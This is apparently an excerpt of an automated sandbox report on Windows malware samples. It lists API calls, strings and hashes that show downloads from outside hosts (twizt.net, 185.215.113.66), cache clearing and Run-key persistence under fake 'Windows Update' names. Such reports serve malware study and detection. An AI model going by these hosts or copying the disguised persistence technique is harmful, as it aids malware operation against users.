                                                                                  • Part of subcall function 006F1000: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 006F1013
                                                                                  • Part of subcall function 006F1000: InternetOpenUrlA.WININET(00000000,http://twizt.net/ALLSTATA,00000000,00000000,00000000,00000000), ref: 006F1033
                                                                                  • Part of subcall function 006F1000: Sleep.KERNELBASE(000003E8), ref: 006F1041
                                                                                  • Part of subcall function 006F1000: InternetCloseHandle.WININET(?), ref: 006F104B
                                                                                  • Part of subcall function 006F1000: Sleep.KERNELBASE(000003E8), ref: 006F1056
                                                                                  • Part of subcall function 006F1000: InternetCloseHandle.WININET(00000000), ref: 006F1060
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2003442179.00000000006F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006F0000, based on PE: true
                                                                                • Associated: 0000000F.00000002.2003429763.00000000006F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                • Associated: 0000000F.00000002.2003454543.00000000006F2000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                • Associated: 0000000F.00000002.2003467319.00000000006F4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_6f0000_330125677.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$Sleep$CloseHandleOpen$EnvironmentExistsExpandFilePathStringswsprintf
                                                                                • String ID:
                                                                                • API String ID: 3964721517-0
                                                                                • Opcode ID: b03f7d65d66b2dacf12e56ff20ca5e41222fb2fad0e67ac63699144752fffdaf
                                                                                • Instruction ID: 37c4f2c4d36b78e06b84caa4d754e5d07844fb906114f7abc1a2afce9f208339
                                                                                • Opcode Fuzzy Hash: b03f7d65d66b2dacf12e56ff20ca5e41222fb2fad0e67ac63699144752fffdaf
                                                                                • Instruction Fuzzy Hash: 42C08C3110428EA2928073B26C0A736318A4B033D1F005023B300CC0D6DD42D840E4BA

                                                                                Callgraph

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 ae10a0-ae10b8 Sleep call ae1000 3 ae111d-ae1120 0->3 4 ae10ba-ae1117 DeleteUrlCacheEntry * 9 0->4 4->3
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 00AE10A8
                                                                                  • Part of subcall function 00AE1000: ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00AE101A
                                                                                  • Part of subcall function 00AE1000: wsprintfW.USER32 ref: 00AE1033
                                                                                  • Part of subcall function 00AE1000: PathFileExistsW.KERNELBASE(?), ref: 00AE1043
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/1), ref: 00AE10BF
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/2), ref: 00AE10CA
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/3), ref: 00AE10D5
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/4), ref: 00AE10E0
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/5), ref: 00AE10EB
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/6), ref: 00AE10F6
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/_1), ref: 00AE1101
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/_2), ref: 00AE110C
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/_3), ref: 00AE1117
                                                                                Strings
                                                                                • http://185.215.113.66/_2, xrefs: 00AE1107
                                                                                • http://185.215.113.66/_1, xrefs: 00AE10FC
                                                                                • http://185.215.113.66/2, xrefs: 00AE10C5
                                                                                • http://185.215.113.66/3, xrefs: 00AE10D0
                                                                                • http://185.215.113.66/5, xrefs: 00AE10E6
                                                                                • http://185.215.113.66/6, xrefs: 00AE10F1
                                                                                • http://185.215.113.66/_3, xrefs: 00AE1112
                                                                                • http://185.215.113.66/1, xrefs: 00AE10BA
                                                                                • http://185.215.113.66/4, xrefs: 00AE10DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2002847781.0000000000AE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00AE0000, based on PE: true
                                                                                • Associated: 00000010.00000002.2002834770.0000000000AE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                • Associated: 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                • Associated: 00000010.00000002.2002873028.0000000000AE4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_ae0000_1245832676.jbxd
                                                                                Similarity
                                                                                • API ID: CacheDeleteEntry$EnvironmentExistsExpandFilePathSleepStringswsprintf
                                                                                • String ID: http://185.215.113.66/1$http://185.215.113.66/2$http://185.215.113.66/3$http://185.215.113.66/4$http://185.215.113.66/5$http://185.215.113.66/6$http://185.215.113.66/_1$http://185.215.113.66/_2$http://185.215.113.66/_3
                                                                                • API String ID: 1624407425-19798704
                                                                                • Opcode ID: bf8f6af40e7dd4487eb6e5f1f644a594c7822d32ecd37beef4944e117d3e8b47
                                                                                • Instruction ID: efdb2d8039d7198dfb41d91250a95fb2a018ebb8939968d77484edcb419d08a8
                                                                                • Opcode Fuzzy Hash: bf8f6af40e7dd4487eb6e5f1f644a594c7822d32ecd37beef4944e117d3e8b47
                                                                                • Instruction Fuzzy Hash: CAF0A0712803DEF78301E7E66C5FB49356C7A84B417410810F1468D4D1C9E44846DF36

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 5 ae1000-ae104b ExpandEnvironmentStringsW wsprintfW 7 ae104d-ae104f 5->7 8 ae1053-ae107c 5->8 9 ae108d-ae1090 7->9 11 ae107e-ae1084 8->11 12 ae108b 8->12 11->12 12->9
                                                                                APIs
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00AE101A
                                                                                • wsprintfW.USER32 ref: 00AE1033
                                                                                • PathFileExistsW.KERNELBASE(?), ref: 00AE1043
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000002,00000000), ref: 00AE1069
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 00AE1085
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2002847781.0000000000AE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00AE0000, based on PE: true
                                                                                • Associated: 00000010.00000002.2002834770.0000000000AE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                • Associated: 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                • Associated: 00000010.00000002.2002873028.0000000000AE4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_ae0000_1245832676.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                                • String ID: %s\ssss3444443.jpg$%userprofile%$@1Wu.Wu$^Iu
                                                                                • API String ID: 750032643-433313667
                                                                                • Opcode ID: e55e9e071c83e0c1da5c83b90fc0900ea3659bfaff2d0e7bd3c472156ea60d7c
                                                                                • Instruction ID: db3f35223980828397a6bc6c2819d53d9d6954979ba927021de6f9aa10f2ce18
                                                                                • Opcode Fuzzy Hash: e55e9e071c83e0c1da5c83b90fc0900ea3659bfaff2d0e7bd3c472156ea60d7c
                                                                                • Instruction Fuzzy Hash: 64014FB094035CABDB30DBA09C8AFE5733CAB44704F0046A4A719AA0D1DAB05AC5DBA5

                                                                                Callgraph

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 003F10AB
                                                                                  • Part of subcall function 003F1000: ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 003F101A
                                                                                  • Part of subcall function 003F1000: wsprintfW.USER32 ref: 003F1033
                                                                                  • Part of subcall function 003F1000: PathFileExistsW.KERNELBASE(?), ref: 003F1043
                                                                                • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000002,00000000), ref: 003F1190
                                                                                • RegDeleteValueW.KERNELBASE(00000000,Windows Update 39405), ref: 003F11BE
                                                                                • RegCloseKey.KERNELBASE(00000000), ref: 003F11CA
                                                                                • Sleep.KERNELBASE(000007D0), ref: 003F11D5
                                                                                • RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000002,00000000), ref: 003F11ED
                                                                                • RegDeleteValueW.KERNELBASE(00000000,Windows Update 39405), ref: 003F121B
                                                                                • RegCloseKey.KERNELBASE(00000000), ref: 003F1227
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2075448396.00000000003F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 003F0000, based on PE: true
                                                                                • Associated: 00000012.00000002.2075429083.00000000003F0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                • Associated: 00000012.00000002.2075465997.00000000003F2000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                • Associated: 00000012.00000002.2075481764.00000000003F3000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                • Associated: 00000012.00000002.2075496400.00000000003F4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_3f0000_300129380.jbxd
                                                                                Similarity
                                                                                • API ID: CloseDeleteOpenSleepValue$EnvironmentExistsExpandFilePathStringswsprintf
                                                                                • String ID: (%?$0"?$0&?$@'?$Desktop Window Manager$Host Process for Windows Services$Microsoft Windows Driver Configuration$Microsoft Windows Installer Svc$Microsoft Windows Service$Microsoft Windows Update Service$Microsoft Windows Update Services$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$WinCfgMgr$Windows Update 362646246$Windows Update 39405$Windows Update 4859540300$Windows Update 49400405050$Windows Update 495006960$Windows Update 7080607400$Windows Update 75849348$Windows Update Service Manager$Windows Upgrade Manager$\#?$\$?$`%?$d"?$h&?
                                                                                • API String ID: 2575504554-2501668519
                                                                                • Opcode ID: 686e9f2868b53ed851826fd44dab8971b7186ceceb9a65337a6ab07752330cff
                                                                                • Instruction ID: 3d9dba7689559417f65f9b06fe92f6d55ce205a24015536bc21dd99dfc84c27a
                                                                                • Opcode Fuzzy Hash: 686e9f2868b53ed851826fd44dab8971b7186ceceb9a65337a6ab07752330cff
                                                                                • Instruction Fuzzy Hash: A241F6B990020CEBEB16CFE5E948ABFBBB4BB04709F204508E7057B251C7B45A48DF94

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 003F101A
                                                                                • wsprintfW.USER32 ref: 003F1033
                                                                                • PathFileExistsW.KERNELBASE(?), ref: 003F1043
                                                                                • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000001,00000002,00000000), ref: 003F1069
                                                                                • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 003F1085
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2075448396.00000000003F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 003F0000, based on PE: true
                                                                                • Associated: 00000012.00000002.2075429083.00000000003F0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                • Associated: 00000012.00000002.2075465997.00000000003F2000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                • Associated: 00000012.00000002.2075481764.00000000003F3000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                • Associated: 00000012.00000002.2075496400.00000000003F4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_3f0000_300129380.jbxd
                                                                                Similarity
                                                                                • API ID: File$ChangeCloseCreateEnvironmentExistsExpandFindNotificationPathStringswsprintf
                                                                                • String ID: %s\975666578.jpg$%userprofile%$^Iu
                                                                                • API String ID: 2220190937-2121632346
                                                                                • Opcode ID: 14a97d898b15f3d5b6c803fd67416b17016e482cf978a9f4e5b39284148430ec
                                                                                • Instruction ID: 65382bdab4f4b8eecd3d6d66b58742f7a206251cc919aaf3be85704cbe322646
                                                                                • Opcode Fuzzy Hash: 14a97d898b15f3d5b6c803fd67416b17016e482cf978a9f4e5b39284148430ec
                                                                                • Instruction Fuzzy Hash: 05014FB154031DEBDB219B609C4AFF6733CAB44704F0086A4A719A60D1DEB45AC9DBA9